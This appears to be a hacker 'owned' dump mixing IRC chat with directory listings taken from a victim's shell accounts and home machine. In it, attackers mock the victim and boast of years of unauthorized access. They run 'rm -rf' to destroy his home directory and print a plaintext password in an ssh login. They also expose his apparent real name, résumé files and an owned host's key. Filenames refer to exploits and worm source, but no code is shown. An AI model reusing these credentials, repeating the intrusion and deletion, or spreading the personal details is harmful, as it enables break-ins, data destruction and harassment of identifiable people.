-rw------- 1 jobe jobe 16124 prettyweed.jpg
-rw-r--r-- 1 jobe jobe 2770 probe-2.3.tar.gz
-rw-r--r-- 1 jobe jobe 599 readme
-rw------- 1 jobe jobe 42247 redir-2.2.1.tar.gz
drwxr-xr-x 2 jobe jobe 1024 res
-rw-r--r-- 1 jobe jobe 16000 rough.notes
-rw------- 1 jobe jobe 7714 rsi-fbsd3.0.tgz
-rw-rw-r-- 1 jobe jobe 18 server
-rwxr-xr-x 1 jobe jobe 172032 sgiawd-lmcrypt
-rwxr-xr-x 1 jobe jobe 293004 sgifd-lmcrypt
drwxrwxr-x 6 jobe jobe 512 shellkit
-rw-rw-r-- 1 jobe jobe 16370 shellkit-20010618.tgz
drwxr-xr-x 7 jobe jobe 512 shres
-rw-r--r-- 1 jobe jobe 13076 sl-binary-kit.tar.gz.pgp
-rw------- 1 jobe jobe 449 spoof.c
-rw------- 1 jobe jobe 3235 spooflib.c
drwxr-xr-x 4 jobe jobe 512 src
-rw-r--r-- 1 jobe jobe 1911375 ssh-2.4.0.tar.gz
-rw-r--r-- 1 jobe jobe 300240 sshd.stuff.tar.gz
-rw-r--r-- 1 jobe jobe 45337 sshd_exp.tgz
-rw-rw-r-- 1 jobe jobe 6444 strmod
-rwx------ 1 jobe jobe 5442 strmod.c
-rw------- 1 jobe jobe 2707 strmod.tar.gz
-rwxr-xr-x 1 jobe jobe 14754 strs
-rw-r--r-- 1 jobe jobe 294 strs.c
-rw-r--r-- 1 jobe jobe 6360 t-shirt-4.0.tar.gz
-rw-r--r-- 1 jobe jobe 2123 t3.c
-rwxr-xr-x 1 jobe jobe 27505 tb
-rw-r--r-- 1 jobe jobe 68401 thc-uht1.tgz
-rwxr-xr-x 1 jobe jobe 14754 tmp
-rw------- 1 jobe jobe 26 tmp.c
drwxr-xr-x 3 jobe jobe 512 tools
-rw-r--r-- 1 jobe jobe 18860 tsl_bind.c
-rw------- 1 jobe jobe 9886 ttdb4sol26.c
-rw------- 1 jobe jobe 10150 ttnew.c
drwx------ 2 jobe jobe 512 tx
-rw-r--r-- 1 jobe jobe 23145 tx.tar.gz
-rw------- 1 jobe jobe 5290472 utssrc.tar.gz
-rwx------ 1 jobe jobe 275 w.pl
-rw------- 1 jobe jobe 8385 w00lien-20020217.tgz
-rw-rw-r-- 1 jobe jobe 28218 w00t;
-rw------- 1 jobe jobe 3338 w1.sh
-rw------- 1 jobe jobe 3453 w1ng.sh
drwxr-xr-x 2 jobe jobe 512 wepcrack-v0.3
-rw------- 1 jobe jobe 8771 wepcrack-v0.3.tar.gz
-rw------- 1 jobe jobe 2762 win2kfaq.txt
drwxrwxr-x 4 jobe jobe 1024 winpenguins
drwx------ 2 jobe jobe 512 worm
-rw------- 1 jobe jobe 24088 worm-src.tar.gz
-rw-r--r-- 1 jobe jobe 3469 wuftpfmt.pl
-rw------- 1 jobe jobe 58909 xenv2.tgz
-rw-r--r-- 1 jobe jobe 4949600 ya_it_doez.mp3
-rw-r--r-- 1 jobe jobe 3176 zap3.tar.gz
<r0b1nleech> Awesome homedir, you are an old school hacker it seems.
<jobe> well i started hacking phone switches and then moved on to redhat
+ systems. i'm currently into darwin systems. lots of porn on those.
<r0b1nleech> Your email is huge!
<jobe> fuck yah man
<jobe> i g0t so much email
<jobe> im subscribed to securityfocus bugtraq
<jobe> incidents
<jobe> w00w00 list
<jobe> vuln dev
<jobe> hert private mailing list
<jobe> teso private mailing list
<jobe> teso public mailing list
<jobe> hert public mailing list
<jobe> vuln dev
<jobe> honeypots
<jobe> private BoW mailing list
<jobe> raver's mailing list
<jobe> the porn trader's mailing list
<jobe> also the dropstatd withdrawl mailing list
<r0b1nleech> What is in your .phoenixaway?
<jobe> everything anyone has messaged me since 1996.
<jobe> I PUT SMILEY FACES IN SHELLCODE BECAUSE IT MAKES ME HAPPY
<r0b1nleech> Ok I am going to rm your hert home dir now ok?
<jobe> no problem, let me back it up first
<r0b1nleech> No.
$ rm -rNOOOOOOOOOOOf ~jobeOFKAG@K@#3,2#F_EKGFDS
$ rm -rf ~jobe
$ ^C^D^D
<[rooster]> jbl: i am in the process of interviewing at enterasys
<jbl> i got an interview with a staffing firm tomorrow morning
<jbl> with mcdonalds
> I JUST GOT RM'D
> I JUST GOT RM'D
> I JUST GOT RM'D
> I JUST GOT RM'D
> I JUST GOT RM'D
<jeru> damn
<mjf> that sux
<jobe> hi homo
<vmy> jobe you tool
*jeru* howd you own him?
*jeru* howd you own him?
> *jeru* howd you own him?
<jobe> if he ownz np9 it's not that hard.
NOTE TO SELF, IT HAS NO SUIDS, NO PUBLIC VULNS, HOW COULD JOBE OWN IT?
> WOOWOO IS NEXT
> JNATHAN IS NEXT
> YOUR FUCKED KID
<vmy> lol
NOTE TO SELF, vmy lol, VMY GOT OWNED ONCE!
<vmy> man
<vmy> noone ever gets rmed any more
> ILL RM YOU NEXT PUSSY
<jobe> duh like the whole world doesn't know my passwd's
NOT TO SELF, GOD JOBE IS A FUCKING IDIOT
<vmy> uh go for it bro
> <jobe> duh like the whole world doesn't know my passwd's
> <jobe> duh like the whole world doesn't know my passwd's
<jobe> hey thats not funny stop
<r0b1nleech> Ok, take us to the next stop along the tour.
<jobe> lets check out slack.net next.
$ ssh -l jbowie slack.net
jbowie@slack.net's password: abc123slack
<jobe> here is my homedir:
$ ls -al
drwxr-x--x 9 jbowie jbowie 2560 .
drwxr-xr-x 807 root wheel 13312 ..
-rw-r--r-- 1 jbowie jbowie 51 .addressbook
-rw-r--r-- 1 jbowie jbowie 2342 .addressbook.lu
-rw-r--r-- 1 jbowie jbowie 117 .bash_history
-rw-r--r-- 1 jbowie jbowie 716 .cshrc
-rw------- 1 jbowie jbowie 2314 .history
-rw-r--r-- 1 jbowie jbowie 322 .irc.easyinst.status
-rw-r--r-- 1 jbowie jbowie 12 .ircrc
-rw-r--r-- 1 jbowie jbowie 233 .login
-rw-r--r-- 1 jbowie jbowie 105 .mailrc
-rw-r--r-- 1 jbowie jbowie 1148 .phoenix
-rw-r--r-- 1 jbowie jbowie 18841 .phoenix.away
-rw------- 1 jbowie jbowie 8191 .pine-debug1
-rw------- 1 jbowie jbowie 19392 .pine-debug2
-rw------- 1 jbowie jbowie 9905 .pine-debug3
-rw------- 1 jbowie jbowie 7737 .pine-debug4
-rw-r--r-- 1 jbowie jbowie 11891 .pinerc
-rw-r--r-- 1 jbowie jbowie 114 .profile
lrwxr-xr-x 1 jbowie jbowie 9 .rhosts -> /dev/null
drwxr-xr-x 2 jbowie jbowie 512 .ssh
drwxr-xr-x 5 jbowie jbowie 512 .tin
-rw-r--r-- 1 jbowie jbowie 15 475.shtml
-rw-r--r-- 1 jbowie jbowie 15 547.shtml
-rw-r--r-- 1 jbowie jbowie 6952 574.shtml
-rw-r--r-- 1 jbowie jbowie 15 745.shtml
-rw-r--r-- 1 jbowie jbowie 15 754.shtml
-rw-r--r-- 1 jbowie jbowie 192540 BIOS.ZIP
-rw------- 1 jbowie jbowie 51591041 Mailbox
-rw-rw-rw- 1 jbowie jbowie 0 Mailbox.lock.949010036.18118.schwing
-rw-r--r-- 1 jbowie jbowie 0 Mailbox.lock.953165142.7684.schwing
-rw-r--r-- 1 jbowie jbowie 481 Makefile
-rw-r--r-- 1 jbowie jbowie 179 README
drwxr-xr-x 2 jbowie jbowie 512 WWW
-rw-r--r-- 1 jbowie jbowie 1100 a
-rwxr-xr-x 1 jbowie jbowie 14758 add
-rw-r--r-- 1 jbowie jbowie 80 add.c
-rw-r--r-- 1 jbowie jbowie 591 arbcmdsc.tar.gz
-rw-r--r-- 1 jbowie jbowie 400 asm.c
-rw------- 1 jbowie jbowie 532480 authlie-1.0.tar
-rw-r--r-- 1 jbowie jbowie 34816 benefits.doc
-rw-r--r-- 1 jbowie jbowie 1244994 bind-src.tar.gz
-rw-r--r-- 1 jbowie jbowie 4947 bind8.html
-rw-r--r-- 1 jbowie jbowie 596 blah
-rw-r--r-- 1 jbowie jbowie 1187 blah.htmnl
-rw-r--r-- 1 jbowie jbowie 2779 blah.lm
-rw-r--r-- 1 jbowie jbowie 596 blah.new
-rw-r--r-- 1 jbowie jbowie 274 blah.sort
-rwxr-xr-x 1 jbowie jbowie 6174 bufmod.7
-rwxr-xr-x 1 jbowie jbowie 20566 cae
-rw------- 1 jbowie jbowie 1282396 cae.core
-rw-r--r-- 1 jbowie jbowie 375 cool.fortunes
drwxr-xr-x 4 jbowie jbowie 512 cyberarmy
-rw-r--r-- 1 jbowie jbowie 731 cyberarmy.exp.c
-rw------- 1 jbowie jbowie 307 dead.letter
-rw-r--r-- 1 jbowie jbowie 29819 dlcommon.c
-rw-r--r-- 1 jbowie jbowie 1178 dlinfo.c
-rw-r--r-- 1 jbowie jbowie 2493 dlmdata.c
-rwxr-xr-x 1 jbowie jbowie 1937 dlpi.7
-rw-r--r-- 1 jbowie jbowie 3064 dlrcv.c
-rw-r--r-- 1 jbowie jbowie 498 dltest.h
-rw-r--r-- 1 jbowie jbowie 79264 dltest.ps
-rwxr-xr-x 1 jbowie jbowie 39859 dltest.tar.gz
-rw-r--r-- 1 jbowie jbowie 2727 dlunitdatareq.c
-rw-r--r-- 1 jbowie jbowie 44544 dracon-olc.doc
-rw-r--r-- 1 jbowie jbowie 0 dumb.c
-rwxr-xr-x 1 jbowie jbowie 14779 f00
-rw-r--r-- 1 jbowie jbowie 3212 f00.c
-rw------- 1 jbowie jbowie 348508 f00.core
-rw------- 1 jbowie jbowie 348508 f00.core
-rw-r--r-- 1 jbowie jbowie 274 findproc.c
-rw-r--r-- 1 jbowie jbowie 30665 fornax-0.0.5.tar.gz
-rwxr-xr-x 1 jbowie jbowie 4261 fp
-rw------- 1 jbowie jbowie 1939 fts.c
-rwxr-xr-x 1 jbowie jbowie 1248915 irc
-rw-r--r-- 1 jbowie jbowie 530294 ircii-2.9-roof.tar.gz
-rw------- 1 jbowie jbowie 5040 irclog.ex.#!w00w00
-rw-r--r-- 1 jbowie jbowie 1597856 jobe.attrition.tar.gz
-rw-r--r-- 1 jbowie jbowie 2750 jobe.resume
-rw-r--r-- 1 jbowie jbowie 4792 jobelog
-rwxr-xr-x 1 jbowie jbowie 7710 le.7
-rw-r--r-- 1 jbowie jbowie 4914 lsa.synth
drwx------ 2 jbowie jbowie 512 mail
-rw-r--r-- 1 jbowie jbowie 1975 nap.c
-rw-r--r-- 1 jbowie jbowie 4413 netmap.bmp.gz
-rw-r--r-- 1 jbowie jbowie 594 new
-rw-r--r-- 1 jbowie jbowie 456 new.procs
-rw-r--r-- 1 jbowie jbowie 508 new.procs2
-rw-r--r-- 1 jbowie jbowie 916150 nsrouter.c675.2.3.0.053.bin
-rw-r--r-- 1 jbowie jbowie 161242 pf.irc
-rwxr-xr-x 1 jbowie jbowie 8268 pfmod.7
-rw-r--r-- 1 jbowie jbowie 480 procs
-rw-r--r-- 1 jbowie jbowie 518 procs2
-rw-r--r-- 1 jbowie jbowie 3360 prym-log
drwxr-xr-x 3 jbowie jbowie 512 public_html
drwxr-xr-x 2 jbowie jbowie 512 s0x
-rw-r--r-- 1 jbowie jbowie 5419 s0x.tgz
-rw-r--r-- 1 jbowie jbowie 65 safsite.out
-rw-r--r-- 1 jbowie jbowie 42949 sexchart.8
-rw-r--r-- 1 jbowie jbowie 600 shellcode2.c
-rw-r--r-- 1 jbowie jbowie 669 sparccmd.c
-rwxr-xr-x 1 jbowie jbowie 120642 spook
-rw------- 1 jbowie jbowie 1049 spook.c
-rw-r--r-- 1 jbowie jbowie 365 test.c
-rwxr-xr-x 1 jbowie jbowie 6007 w00crond
<r0b1nleech> I took a look at f00.c, that the lsd-pl ldt exploit isn't it?
<jobe> yes
<r0b1nleech> Did it work on slack.net openbsd 2.4?
<jobe> i almost got it working i think
<jobe> it keeps segfaulting so that is a good sign
$ rm ~~~~~~~~~jjjjjjjjjjbooooooooooowwwwwwwiieeeeeeeeeeeeeeeeeeeeee
*** Mode change "-o+b jdogg *!jbowie@slack.net" on channel #phrack by Swern
<vmy> hows it comin?
> RMD
> OWNED
*** You have been kicked off channel #cdc by jnathan (Bitch-X BaBy!)
<jobe> man i can't believe it took u guys this long
<jobe> ive used the same password on every shell box for like 7 years
<jobe> took you long enough to catch on
NOTE TO SELF, MAYBE WE ARE JUST TIRED OF OWNING YOU AND FELT LIKE RMING YOU.
> EVERYONE HAS YOUR PASSWORD JOBE
> WE'VE HAD YOUR BOXES FOR 7 YEARS
<jobe> didnt i already tell you that retard
> JOBE
> FACE IT
> YOUR MYTHICAL HACKER MYSTIQUE
> HAS BEEN DESTROYED
> key_22_quantum.efni.com.pub
> WE OWNED YOUR LAME SOLARIS FOR YEARS TOO
<jobe> what mythical hacker mystique?
NOTE TO SELF, JOBE IS THE DARKSIDE.
<jobe> efni waz megaowned
<mjf> jdogg
<jeru> heh
<jnathan> this is getting old :)
<mjf> who are you?
<jnathan> funny, but old
> SHUT THE FUCK UP JNATHAN
<kozubik> wait
<mjf> what about apollo.gtei.net?
NOTE TO SELF, EKIM IS A NARC.
*kozubik* are you JD roberson ?
> APOLLO.GTI.NET
> GAIUS OWNED THAT
*** kozubik has changed the topic on channel #cdc to Nice nice very nice.
> AND TUNNELX IT
<mjf> lol
<mjf> hahaha
<mjf> the gre thing
<kozubik> must be a different jdogg.
<jobe> i dont use netscape for my pron
<jobe> u missed one
<jobe> or 2
<jobe> but thatz ok
> WHICH ONE
<newsham> jdogg is last
<jobe> figure it out hacker genius
> THE OTHERS NOT SOGOOD
> DONT MAKE ME GO RM THOSE TOO
> 0wned.org 1024 41 63897960634680087987473578821662473115676645146414098567729063962534050419025098865273166743308876730034769029776760707909878397798858888397059595356385321592348348338355240266795644650505202538605163304067738669371599283352177980986565362816775661015680930496199752053852827022342775527838857458044942037271
<jobe> ok let us check out my home box now
<jobe> this is the grand finale
<r0b1nleech> Great scotts.
$ ls -al
total 230904
drwxr-xr-x 10 j staff 1536 .
drwxr-xr-x 7 root root 512 ..
-rw------- 1 420 staff 240 .Xauthority
-rw-r--r-- 1 420 staff 124 .cshrc
-rw-r--r-- 1 420 staff 581 .login
-rw------- 1 root staff 100 .sh_history
drwxr-xr-x 3 420 staff 512 .ssh2
drwxrwxrwx 86 420 staff 2048 7_Recommended
-rw-r--r-- 1 420 staff 41787799 7_Recommended.zip
-rwxr-xr-x 1 j staff 6996 Test
-rw-r--r-- 1 j staff 77 Test.c
-rwxr-xr-x 1 root other 70960 a
-rw-r--r-- 1 root other 126 a.c
-rwxr-xr-x 1 root other 7408 addr_wr_test
-rw-r--r-- 1 root other 285 addr_wr_test.c
-rwxr-xr-x 1 j staff 7192 b1nd
-rw-r--r-- 1 j staff 141 b1nd.c
-r-xr-xr-x 1 root other 6874624 bash-2.05-sol7-sparc-local
-rwxr-xr-x 1 j staff 18436 bb
-rw-r--r-- 1 j staff 11694 bb.c
drwxr-xr-x 15 77 1002 1024 binutils-020210
-rw-r--r-- 1 root other 57057280 binutils.tar
drwxr-xr-x 9 root root 512 cde
-rw------- 1 root other 29616 core
-rwxr-xr-x 1 j staff 3255348 dbx-sparc
-r-xr-xr-x 1 root other 411648 gzip-1.2.4-sol7-intel-local
-r-xr-xr-x 1 root other 291328 gzip-1.2.4a-sol7-intel-local
-rw-r--r-- 1 root other 1489931 includes.tar.gz
-rwxr-xr-x 1 420 staff 2326360 irc
drwxr-xr-x 9 420 staff 1024 ircii-2.9
-rw-r--r-- 1 420 staff 2508800 ircii-2.9-roof.tar
-r-xr-xr-x 1 j staff 29512 login
drwxr-xr-x 2 j staff 512 logintest
-r--r--r-- 1 j staff 5361 pam_impl.h
-rw-r--r-- 1 420 staff 161242 pf.irc
drwxr-xr-x 2 j staff 512 plttest
-rw-r--r-- 1 j staff 2237 rquota.h
-rw-r--r-- 1 j staff 1526 rquota.x
-rw-r--r-- 1 j staff 1094 rquota_clnt.c
-rw-r--r-- 1 j staff 4703 rquota_svc.c
-rw-r--r-- 1 j staff 5368 rquota_xdr.c
-rwxr-xr-x 1 root other 6992 sizint
-rw-r--r-- 1 root other 84 sizint.c
-rwxr-xr-x 1 root other 15680 sl
-rw-r--r-- 1 j staff 7051 sol.tar.gz
-rw-r--r-- 1 j staff 1489778 sol7-includes.tar.gz
-rw-r--r-- 1 j staff 11817 sparc_login.c
drwxr-xr-x 14 root root 512 src
-rwxr-xr-x 1 j staff 9504 test
-rw-r--r-- 1 j staff 153 test.c
-rwxr-xr-x 1 j staff 7052 tmp
-rw-r--r-- 1 j staff 128 tmp.c
-rw-r--r-- 1 root other 9847 truss
-rwxr-xr-x 1 j staff 10344 uf
-rw-r--r-- 1 j staff 2441 uf.c
-rwxr-xr-x 1 j staff 9684 uf2
-rwxr-xr-x 1 420 staff 8280 w
-rw-r--r-- 1 420 staff 1520 w00.c
-rwxr-xr-x 1 j staff 9956 w00f
-rw-r--r-- 1 j staff 2433 w00f.c
-rw-r--r-- 1 root other 141 w00t.c
-rwxr-xr-x 1 j staff 9084 z2
-rw-r--r-- 1 j staff 2006 z2.c
-rwxr-xr-x 1 j staff 14252 z3
-rw-r--r-- 1 j staff 7812 z3.c
$ ls -al ~jduck
drwxr-xr-x 2 jduck staff 512 .
drwxr-xr-x 7 root root 512 ..
-rw------- 1 jduck staff 1646 .bash_history
-rw-r--r-- 1 jduck staff 121 .bashrc
-rw-r--r-- 1 jduck staff 124 .cshrc
-rw-r--r-- 1 jduck staff 581 .login
-rw-r--r-- 1 root root 368 Makefile
-rw-r--r-- 1 root root 1423 README
-rwsr-xr-- 1 root suid 7192 b1nd
-rw------- 1 root other 218608 core
-rw-r--r-- 1 root other 0 kkk
-rw-r--r-- 1 root other 1200 memmove.o
-rwxr-xr-x 1 jduck staff 15576 sl
-rwxr-xr-x 1 root other 15608 sparc_login
-rw-r--r-- 1 jduck staff 8662 sparc_login.c
-rw-r--r-- 1 root other 98324 strmod
-rwxr-xr-x 1 35303 root 5442 strmod.c
-rw-r--r-- 1 root other 96352 strmod.o
-rw-r--r-- 1 jduck staff 10240 strmod.tar
-rw-r--r-- 1 root other 1164 strstr.o
$ ls -al ~palmers
total 106
drwxr-xr-x 3 palmers staff 512 .
drwxr-xr-x 7 root root 512 ..
-rw-rw-rw- 1 root staff 46 .bashrc
-rw-rw-rw- 1 root staff 46 .profile
-rwsr-xr-- 1 root suid 7192 b1nd
-rw-r--r-- 1 palmers staff 40960 soa.tar
drwxrwxrwx 2 30 root 512 soladore-0.00
<r0b1nleech> More, more!
$ ls -al /windows
total 6566658
-rwxr-xr-x 1 root wheel 4 $DRVLTR$.~_~
-r-xr-xr-x 1 root wheel 228240 $LDR$
drwxr-xr-x 1 root wheel 32768 $WIN_NT$.~BT
-rwxr-xr-x 1 root wheel 4700204 (Bill Clinton) - Al Gore Paradise.wav
drwxr-xr-x 1 root wheel 32768 .
drwxr-xr-x 22 root wheel 512 ..
-rwxr-xr-x 1 root wheel 18948140 0151 - Bill Clinton - Sex Is Dandy (Marcy Playground - Sex & Candy).wav
-rwxr-xr-x 1 root wheel 29439 101500.cgi
-rwxr-xr-x 1 root wheel 565 101500.zip
drwxr-xr-x 1 root wheel 32768 3dsmaxtemp
-rwxr-xr-x 1 root wheel 667222016 4.4-install.iso
-r-xr-xr-x 1 root wheel 566 ASD.LOG
drwxr-xr-x 1 root wheel 32768 ATI
-rwxr-xr-x 1 root wheel 271 AUTOEXEC.BAK
-rwxr-xr-x 1 root wheel 254 AUTOEXEC.BAT
-rwxr-xr-x 1 root wheel 392 AspiLog.TXT
drwxr-xr-x 1 root wheel 32768 BDE
-r-xr-xr-x 1 root wheel 178 BOOT.INI
-rwxr-xr-x 1 root wheel 46822 BOOTLOG.PRV
-rwxr-xr-x 1 root wheel 56966 BOOTLOG.TXT
-r-xr-xr-x 1 root wheel 512 BOOTSECT.DOS
-rwxr-xr-x 1 root wheel 15611948 Bill_Clinton-Gettin_sticky_wit_it.wav
-rwxr-xr-x 1 root wheel 51300908 Billy Joel - We Didn't Start the Fire.wav
-rwxr-xr-x 1 root wheel 11776 Bowie_Jonathan.doc
-r-xr-xr-x 1 root wheel 241696 CLASSES.1ST
-rwxr-xr-x 1 root wheel 93040 COMMAND.COM
-rwxr-xr-x 1 root wheel 0 CONFIG.BAK
-rwxr-xr-x 1 root wheel 0 CONFIG.SYS
drwxr-xr-x 1 root wheel 32768 Casey's Punk
-rwxr-xr-x 1 root wheel 12156 CaseyXmasXXX.cmp
drwxr-xr-x 1 root wheel 32768 Casino
-rwxr-xr-x 1 root wheel 46404 DETLOG.TXT
-rwxr-xr-x 1 root wheel 40527404 DJ Diggity - Nelly & Others - (Hot Shit) Country Grammar [Remix].wav
-rwxr-xr-x 1 root wheel 20381228 Isaac - Face Down, Ass Up, That's the way we like to fuck.wav
-rwxr-xr-x 1 root wheel 3951 Dreamisoz.fr.st-hlg-hunt.bob
-rwxr-xr-x 1 root wheel 32768 Excitebike 64 (U) [!].mpk
-rwxr-xr-x 1 root wheel 16777216 Excitebike 64 (U) [!].rom
-rwxr-xr-x 1 root wheel 6445060 Expert Blowjob01 (19 Sec) - Amazing! Deepthroat Blowjob Sex Young Hidden Voyeur Amateur.mpg
drwxr-xr-x 1 root wheel 32768 FFX Videos
drwxr-xr-x 1 root wheel 32768 FLWBass Demo
drwxr-xr-x 1 root wheel 32768 Folder Settings
drwxr-xr-x 1 root wheel 32768 Games
drwxr-xr-x 1 root wheel 32768 Hack
drwxr-xr-x 1 root wheel 32768 INSTALL
-r-xr-xr-x 1 root wheel 110080 IO.SYS
-rwxr-xr-x 1 root wheel 608 IPH.PH
-rwxr-xr-x 1 root wheel 46058037 ISS.System.Security.Scanner.v4.WinNT2K.DOD.tar.gz
drwxr-xr-x 1 root wheel 32768 ISSv4
-rwxr-xr-x 1 root wheel 2880000 ISSv4.R00
-rwxr-xr-x 1 root wheel 2880000 ISSv4.R01
-rwxr-xr-x 1 root wheel 2880000 ISSv4.R02
-rwxr-xr-x 1 root wheel 2880000 ISSv4.R03
-rwxr-xr-x 1 root wheel 2880000 ISSv4.R04
-rwxr-xr-x 1 root wheel 2880000 ISSv4.R05
-rwxr-xr-x 1 root wheel 2880000 ISSv4.R06
-rwxr-xr-x 1 root wheel 2880000 ISSv4.R07
-rwxr-xr-x 1 root wheel 2880000 ISSv4.R08
-rwxr-xr-x 1 root wheel 2880000 ISSv4.R09
-rwxr-xr-x 1 root wheel 2880000 ISSv4.R10
-rwxr-xr-x 1 root wheel 2880000 ISSv4.R11
-rwxr-xr-x 1 root wheel 2880000 ISSv4.R12
-rwxr-xr-x 1 root wheel 2880000 ISSv4.R13
-rwxr-xr-x 1 root wheel 2809651 ISSv4.R14
-rwxr-xr-x 1 root wheel 2880000 ISSv4.RAR
-rwxr-xr-x 1 root wheel 2177360 InstallShockmachine.EXE
-rwxr-xr-x 1 root wheel 11264 Jonathan_Bowie_Resume.doc
-rwxr-xr-x 1 root wheel 4 MSDOS.---
-r-xr-xr-x 1 root wheel 1664 MSDOS.SYS
drwxr-xr-x 1 root wheel 32768 MSVS98
-rwxr-xr-x 1 root wheel 679673856 Mandrake81-cd1-inst.i586.iso
drwxr-xr-x 1 root wheel 32768 Music
drwxr-xr-x 1 root wheel 32768 My Documents
drwxr-xr-x 1 root wheel 32768 My Music
-rwxr-xr-x 1 root wheel 32768 NBA Jam 2000 (U) [!].mpk
-rwxr-xr-x 1 root wheel 16777216 NBA Jam 2000 (U) [!].v64
drwxr-xr-x 1 root wheel 32768 NCDTREE
-rwxr-xr-x 1 root wheel 16211 NETLOG.TXT
-rwxr-xr-x 1 root wheel 45992492 Nas & Puff Daddy - Hate Me Now.wav
drwxr-xr-x 1 root wheel 32768 NovaLogic
-rwxr-xr-x 1 root wheel 358842368 OpenBSD30-i386-base-ipf.iso
-rwxr-xr-x 1 root wheel 2527 PCcheck.LOG
drwxr-xr-x 1 root wheel 32768 PSA Stuff
drwxr-xr-x 1 root wheel 32768 Program Files
-rwxr-xr-x 1 root wheel 1448 README.TXT
-rwxr-xr-x 1 root wheel 86016 REGMON.EXE
-rwxr-xr-x 1 root wheel 13232 REGMON.HLP
-rwxr-xr-x 1 root wheel 22576 REGSYS.SYS
-rwxr-xr-x 1 root wheel 23143 REGVXD.VXD
drwxr-xr-x 1 root wheel 32768 Recycled
-rwxr-xr-x 1 root wheel 445 SCANDISK.LOG
-rwxr-xr-x 1 root wheel 189869 SETUPLOG.TXT
-rwxr-xr-x 1 root wheel 6889472 SSHWinClient-3.1.0-build235.exe
-rwxr-xr-x 1 root wheel 5166 SUHDLOG.DAT
-rwxr-xr-x 1 root wheel 544800 SYSTEM.1ST
drwxr-xr-x 1 root wheel 32768 Shit Talker v1.2
drwxr-xr-x 1 root wheel 32768 Sketcher
drwxr-xr-x 1 root wheel 32768 SoftIce
drwxr-xr-x 1 root wheel 32768 Sonja Songs
drwxr-xr-x 1 root wheel 32768 Temp
-rwxr-xr-x 1 root wheel 261876069 TheSims.rar
-rwxr-xr-x 1 root wheel 4159692 Traci - Deep_Inside_Traci _Lords.mov
-rwxr-xr-x 1 root wheel 10986500 Tracy n Ron.mpg
-rwxr-xr-x 1 root wheel 1667960 Untitled-1.psd
-rwxr-xr-x 1 root wheel 1167628 Untitled-2.psd
-rwxr-xr-x 1 root wheel 49152 VIDEOROM.BIN
drwxr-xr-x 1 root wheel 32768 Valerie2
drwxr-xr-x 1 root wheel 32768 WAVs
drwxr-xr-x 1 root wheel 32768 WINDOWS
drwxr-xr-x 1 root wheel 32768 WINWORD
-rwxr-xr-x 1 root wheel 62 WS_FTP.LOG
drwxr-xr-x 1 root wheel 32768 Winzip
drwxr-xr-x 1 root wheel 32768 _RESTORE
drwxr-xr-x 1 root wheel 32768 acadtemp
drwxr-xr-x 1 root wheel 32768 acidwarp
-rwxr-xr-x 1 root wheel 669935 anarchy.txt
-rwxr-xr-x 1 root wheel 931004 anarchyv5.zip
-rwxr-xr-x 1 root wheel 731617 audc20.exe
-rwxr-xr-x 1 root wheel 224 autoexec.nav
-rwxr-xr-x 1 root wheel 1120 baseclasses.log
-rwxr-xr-x 1 root wheel 647181 bee.txt
drwxr-xr-x 1 root wheel 32768 bill
-rwxr-xr-x 1 root wheel 403916 bing-j.jpg
-rwxr-xr-x 1 root wheel 488217 bing1-j.jpg
-rwxr-xr-x 1 root wheel 1459 blah
-rwxr-xr-x 1 root wheel 177298 bombs.zip
drwxr-xr-x 1 root wheel 32768 cable modems - breaks the lancity modem cap
-rwxr-xr-x 1 root wheel 2378 cart.html
drwxr-xr-x 1 root wheel 32768 caseyxmas
-rwxr-xr-x 1 root wheel 9771787 cdjd.exe
-rwxr-xr-x 1 root wheel 402789 cj_7979.wmv
drwxr-xr-x 1 root wheel 32768 contrib
-rwxr-xr-x 1 root wheel 644608 cookbook97.doc
-rwxr-xr-x 1 root wheel 97458 corn029[1].zip
drwxr-xr-x 1 root wheel 32768 cripto
-rwxr-xr-x 1 root wheel 159258 csircd-1.13.tar.gz
-rwxr-xr-x 1 root wheel 127502 curt-mosiac.jpg
-rwxr-xr-x 1 root wheel 1629844 curt-mosiac.psd
drwxr-xr-x 1 root wheel 32768 cygwin
-rwxr-xr-x 1 root wheel 163437 data1024.dbb
-rwxr-xr-x 1 root wheel 173396 data256.dbb
-rwxr-xr-x 1 root wheel 9303 data4096.dbb
drwxr-xr-x 1 root wheel 32768 dc-ufc
drwxr-xr-x 1 root wheel 32768 dcstuff
drwxr-xr-x 1 root wheel 32768 decoded
drwxr-xr-x 1 root wheel 32768 deusex
-rwxr-xr-x 1 root wheel 8769 dod.nfo
-rwxr-xr-x 1 root wheel 34179 download.cgi
-rwxr-xr-x 1 root wheel 20000000 e-cp2k.001
-rwxr-xr-x 1 root wheel 337 e-cp2k.sfv
-rwxr-xr-x 1 root wheel 20000000 e-gta2dc.001
-rwxr-xr-x 1 root wheel 20000000 e-hoylec.001
-rwxr-xr-x 1 root wheel 18456576 e-sf3rds.001
-rwxr-xr-x 1 root wheel 18268 e_nav2001be.zip
-rwxr-xr-x 1 root wheel 468087 ec2t2.exe
-rwxr-xr-x 1 root wheel 1248 envja6hw.sys
-rwxr-xr-x 1 root wheel 1248 envjawt3.sys
-rwxr-xr-x 1 root wheel 414 file_id.diz
-rwxr-xr-x 1 root wheel 632485888 flwpro.iso
drwxr-xr-x 1 root wheel 32768 ftproot
-rwxr-xr-x 1 root wheel 2407 g_lps_ies[1].zip
-rwxr-xr-x 1 root wheel 11070 gr_Budswell Stoner.current
-rwxr-xr-x 1 root wheel 7135 gr_Budswell Stoner.previous
drwxr-xr-x 1 root wheel 32768 hacker
-rwxr-xr-x 1 root wheel 267526 hamilton.bmp
-rwxr-xr-x 1 root wheel 74416 hamilton.psf
-rwxr-xr-x 1 root wheel 840 hydro.txt
drwxr-xr-x 1 root wheel 32768 ida
drwxr-xr-x 1 root wheel 32768 ios
-rwxr-xr-x 1 root wheel 1871 ip.txt
-rwxr-xr-x 1 root wheel 394069 j.jpg
-rwxr-xr-x 1 root wheel 20000000 kal-ths2.001
-rwxr-xr-x 1 root wheel 24576 kill_cih.exe
drwxr-xr-x 1 root wheel 32768 latest
-rwxr-xr-x 1 root wheel 12555 lp-shop.html
drwxr-xr-x 1 root wheel 32768 mIRC
drwxr-xr-x 1 root wheel 32768 mame
-rwxr-xr-x 1 root wheel 20875 marb.jpg
drwxr-xr-x 1 root wheel 32768 master_of_orion_2
-rwxr-xr-x 1 root wheel 7737584 mjb51149enu.exe
drwxr-xr-x 1 root wheel 32768 mp3z
-rwxr-xr-x 1 root wheel 98 mp_.current
-rwxr-xr-x 1 root wheel 90 mp_.previous
-rwxr-xr-x 1 root wheel 10 mp_Budswell Stoner.current
